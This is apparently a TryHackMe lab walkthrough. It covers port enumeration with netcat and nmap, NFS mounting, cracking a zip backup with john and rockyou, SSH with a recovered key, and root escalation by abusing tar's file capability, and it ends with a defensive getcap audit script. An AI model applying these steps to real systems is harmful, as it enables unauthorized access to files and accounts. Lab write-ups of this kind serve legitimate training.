THM: The Server from Hell

Walkthrough

CTF Platform: TryHackMe

Level: Medium

Tools Used:

  • nmap
  • netcat (nc)
  • zipinfo, zip2john, john
  • ssh
  • getcap
  • tar

Resources Used:

Steps for the CTF

Step 1: Enumeration

The first step in any CTF is enumeration. Start by connecting to port 1337 using netcat:

nc <IP> 1337

You will need to check a range of ports to find the hidden service that carries the next hint. Use a loop to grab the banner from each one:

for i in {1..100}; do nc <IP> $i; echo ""; done

Once you identify an open port (e.g., 12345), connect to it:

nc <IP> 12345

Run a script and version scan with nmap against the RPC (111) and NFS (2049) ports:

nmap -sC -sV -p111,2049 <IP>

Step 2: NFS Mounting

From the nmap results, you may discover an NFS share. Create a directory and mount the NFS share:

mkdir nfs
sudo mount -t nfs <IP>: nfs
tree nfs

Inspect the contents of the mounted directory to find useful files.

Step 3: Cracking the Backup File

Inside the NFS share, you will find a backup.zip file. Extract information about the zip file:

zipinfo backup.zip

Convert the zip file into a hash format compatible with john:

zip2john backup.zip > backup.hash

Crack the hash using john and the rockyou.txt wordlist:

john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt

Once cracked, extract the contents of the zip file and locate the flag.txt.

Step 4: SSH Access

In the extracted files, you will find a hint.txt file. Read it for clues:

cat hint.txt

Perform another nmap scan to discover open SSH ports:

nmap -sV -p 2500-4500 <IP> | grep -i ssh

Locate the private key (id_rsa) and set the correct permissions:

chmod 600 id_rsa

Use the private key to SSH into the server as the user hades:

ssh -i id_rsa hades@<IP> -p 3333

Once logged in, spawn a proper shell:

exec '/bin/bash'

Locate and read the user.txt file:

cat user.txt

Step 5: Privilege Escalation

To escalate privileges, check for capabilities assigned to binaries:

getcap -r / 2>/dev/null

Identify a binary with an unusual capability (here, tar). Because that capability lets tar read files its invoking user normally cannot, archive root.txt from the /root directory and then extract the archive; tar strips the leading slash, so the copy lands under ./root/:

tar -cvf flag.tar /root/root.txt
tar xf flag.tar

Read the contents of the root.txt file:

cat root/root.txt
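
As a defensive counterpart to the getcap check in Step 5, here is an added example (not part of the original walkthrough): a POSIX shell function that parses getcap -r output and flags binaries carrying capabilities that bypass file permissions, the kind of misconfiguration that made tar usable here. It runs over a constructed sample rather than a live system; the risky-capability list and the sample paths are assumptions.

```shell
#!/bin/sh
# Audit `getcap -r / 2>/dev/null` output for file capabilities that let a binary
# read or write files its user normally could not. Added example, not the room's code.
# Handles both libcap output styles:
#   /usr/bin/tar = cap_dac_read_search+ep   (older libcap)
#   /usr/bin/tar cap_dac_read_search=ep     (libcap 2.41 and later)

# Capabilities that bypass DAC checks or are root-equivalent (assumed list).
RISKY_CAPS='cap_dac_read_search cap_dac_override cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# flag_risky_caps: reads getcap lines on stdin, prints "<path> <capability>" per hit.
# Assumes paths without spaces, as getcap prints them on a normal system.
flag_risky_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}        # everything before the first space
    rest=${line#* }         # capability set, possibly preceded by "= "
    rest=${rest#= }
    # split "cap_a,cap_b=ep" or "cap_a+ep" into bare capability names
    for c in $(printf '%s' "$rest" | tr ',=+' '   '); do
      case " $RISKY_CAPS " in
        *" $c "*) printf '%s %s\n' "$path" "$c" ;;
      esac
    done
  done
}

# Constructed sample standing in for a real getcap run (not taken from the room).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/arping cap_net_raw=ep'

# audit_sample: runs the check over the constructed sample.
audit_sample() {
  printf '%s\n' "$SAMPLE_GETCAP" | flag_risky_caps
}

# Live usage on a host you administer:  getcap -r / 2>/dev/null | flag_risky_caps
```

Only tar and the setuid-capable python interpreter are reported; ping and arping keep cap_net_raw, which is expected and harmless.
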

This post is licensed under CC BY 4.0 by the author.